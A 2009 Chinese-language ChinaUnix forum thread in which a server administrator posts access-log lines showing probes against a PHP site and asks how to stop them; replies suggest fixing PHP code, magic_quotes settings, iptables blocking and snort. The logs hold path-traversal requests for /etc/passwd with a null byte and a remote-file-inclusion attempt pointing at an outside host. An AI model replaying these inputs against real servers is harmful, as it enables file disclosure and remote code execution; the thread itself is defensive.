免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2662 | 回复: 7
打印 上一主题 下一主题

[Web] 如何杜绝这类的旁注攻击 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2009-06-09 10:57 |只看该作者 |倒序浏览
5可用积分
单位有台服务器是nginx+php+mysql架构,近日访问日志里有很多这样的记录,很明显是有人想试图进一步获得权限,请问各位高人有没有什么办法可以解决这样的问题啊?有的话请详细说一说

[code]
206.57.28.62 - - [05/Jun/2009:01:55:06 +0800] GET /flash/admin.php?action=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 "404" 18274 "-" "libwww-perl/5.805" "77.221.130.2, 217.212.252.82"
8.18.42.94 - - [05/Jun/2009:01:55:08 +0800] GET /flash/admin.php?action=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 "404" 18273 "-" "libwww-perl/5.805" "77.221.130.2, 217.212.252.82"
8.14.192.37 - - [05/Jun/2009:01:56:32 +0800] GET /solar-power-led-battery-free%20.../flash/admin.php?action=http://www.raindrip.com/cms/id.txt???? HTTP/1.1 "404" 18412 "-" "libwww-perl/5.79" "218.234.21.178, 211.175.153.78"
[/code]

最佳答案

查看完整内容

这未必就是worm的试探,从上边来看入侵者想通过include的漏洞来包含文件而已。

论坛徽章:
0
2 [报告]
发表于 2009-06-09 10:57 |只看该作者
这未必就是worm的试探,从上边来看入侵者想通过include的漏洞
来包含文件而已。

论坛徽章:
0
3 [报告]
发表于 2009-06-09 11:04 |只看该作者
我的意思是有没有办法限制用户不能使用这些../和???符号

论坛徽章:
381
CU十二周年纪念徽章
日期:2014-01-04 22:46:58CU大牛徽章
日期:2013-03-13 15:32:35CU大牛徽章
日期:2013-03-13 15:38:15CU大牛徽章
日期:2013-03-13 15:38:52CU大牛徽章
日期:2013-03-14 14:08:55CU大牛徽章
日期:2013-04-17 11:17:19CU大牛徽章
日期:2013-04-17 11:17:32CU大牛徽章
日期:2013-04-17 11:17:37CU大牛徽章
日期:2013-04-17 11:17:42CU大牛徽章
日期:2013-04-17 11:17:47CU大牛徽章
日期:2013-04-17 11:17:52CU大牛徽章
日期:2013-04-17 11:17:56
4 [报告]
发表于 2009-06-09 11:10 |只看该作者
../和?符号都是标准的http字符,没办法限制的

论坛徽章:
0
5 [报告]
发表于 2009-06-09 11:15 |只看该作者
那有什么办法阻止这些蠕虫程序的试探呢?

论坛徽章:
0
6 [报告]
发表于 2009-06-09 16:50 |只看该作者

回复 #1 00306 的帖子

这个限制 尽量看看php上的程序是否足够的完善和严谨

论坛徽章:
0
7 [报告]
发表于 2009-06-10 09:52 |只看该作者
原帖由 00306 于 2009-6-9 10:57 发表
单位有台服务器是nginx+php+mysql架构,近日访问日志里有很多这样的记录,很明显是有人想试图进一步获得权限,请问各位高人有没有什么办法可以解决这样的问题啊?有的话请详细说一说

[code]
206.57.28.62  ...



magic_quotes_gpc = On,这个默认是开的,转义用的, get,post,cookie里的引号变为斜杠,如值 (It's "PHP!") 会自动转换成 (It\'s \"PHP!\") 如果不想转成”\”的话,可以在magic_quotes_sybase = On设置为开,他就把单引号转成双引了,这个可以虚张声势.

论坛徽章:
0
8 [报告]
发表于 2009-06-15 09:48 |只看该作者
1 個人建議寫個shell
找一個共同點後,show 出IP如下
這就是一個位一性 ../../../../../../../../../../../../../etc/passwd,  show 出些這些所有問題,提取IP段,使用IPtables 阻止,  shell 放到計劃任務中,10分鍾去一次腳本

2 建義使用 snort +iptables 這些詳細CU中搜一下吧
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP